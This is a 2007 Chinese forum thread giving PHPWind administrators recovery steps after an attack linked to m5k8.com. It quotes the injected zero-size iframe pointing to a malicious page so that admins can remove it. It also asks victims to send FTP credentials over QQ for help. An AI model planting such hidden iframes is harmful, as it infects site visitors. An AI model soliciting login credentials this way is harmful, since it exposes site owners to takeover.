[所有站长重视这个文件]如果你中了这次攻击，并且有m5k8.com

hutu7927 · 发表于 2007-4-9 15:58:07

适合对象
PHPWIND论坛站长

如果你中了这次攻击，并且有m5k8.com
1.打补丁
下载地址:
5.0.1 版补丁下载地址: http://www.phpwind.com/5.0/safe_repair.zip
5.3 版补丁下载地址: http://www.phpwind.com/5.3/safe_repair.zip

2.下载修改密码工具修改管理员密码
下载地址:http://www.phpwind.net/read-htm-tid-392255.html
主意:无论你的密码是否给更改都请更换

3.修改管理员邮箱帐号
如果你的邮箱帐号与管理员帐号密码相同...即使未修改也请操作

4.检查后台管理员帐号是否异常
是否有增加了其他的管理员?

5.检查后台插件是否有异常插件
例如奇怪的插件,或根本没有名字的插件

6.检查核心CSS文件是否有恶意代码
<iframe 或者是其他广告程序

7.修改\data\bbscache\config.php 文件找到
<iframe src=http://www.m5k8.com/gr.htm width=0 height=0 frameborder=0></iframe>
删除

8.后台广告管理检查是否有非法广告添加

9.重启apache 系统或iis

10.删除 /template/wind/live.htm
直接删除 data/bbscache/admin_recors.php
如果没有admin_recors.php文件检查 admin_record.php .

基本上OK 了，祝各位好运

另外希望大家理解官方,多一点支持，少一点辱骂.有经验的朋友多一些奉献！毕竟PHPWIND也陪大家走过这么多年了.微软都一堆的BUG，BUG 是没办法完全避免的.希望大家都重视就好了.

http://www.phpwind.net/read-htm- ... toread--page-1.html

hutu7927 · 发表于 2007-4-9 16:04:47

免费解决所有phpwind的安全问题, 让您彻底放心(非安全问题,勿扰)
本帖被 winner 执行加亮操作(2007-04-07)
(1)如果您还没打过 4月6号出的安全补丁，请速速进行以下步骤

下载安全补丁
5.0.1 版补丁: http://www.phpwind.com/5.0/safe_repair.zip
5.3 版补丁: http://www.phpwind.com/5.3/safe_repair.zip

请马上使用论坛创始人帐号密码进入后台(比如http://www.yourwesite.com/admin.php)，然后立即修改创始人的密码，并检查是否有可疑的论坛管理员

如果发现后台进不去，可以使用创始人密码修复工具 http://www.phpwind.net/read-htm-tid-392255.html

如果发现中了木马，请使用安全检测工具 http://www.phpwind.com/2.0/safe.zip 按照说明进行站点安全检查(会自动删除非法文件，不用理会提示信息)

(2)如果您在 4月6号后下载的最新版本，您可以高枕无忧
(3)如果您未打过补丁，并受到攻击被更改了管理员密码，请联系我QQ
(4)如果您的问题超过我上面的预测，也请联系我，本人尽力帮助

需要安全检测的，通过QQ验证后，请先告知 ftp地址、用户名、密码，我看到消息后，将为您解决论坛的安全问题

PHPWind 安全应急小组QQ：
79431107
247833282
53181287
184238416
164919304
88232620
38848370
184299537
84707986

请注明: pw 安全检测

非工作日应急电话支持：
TEL：(86)571-86911887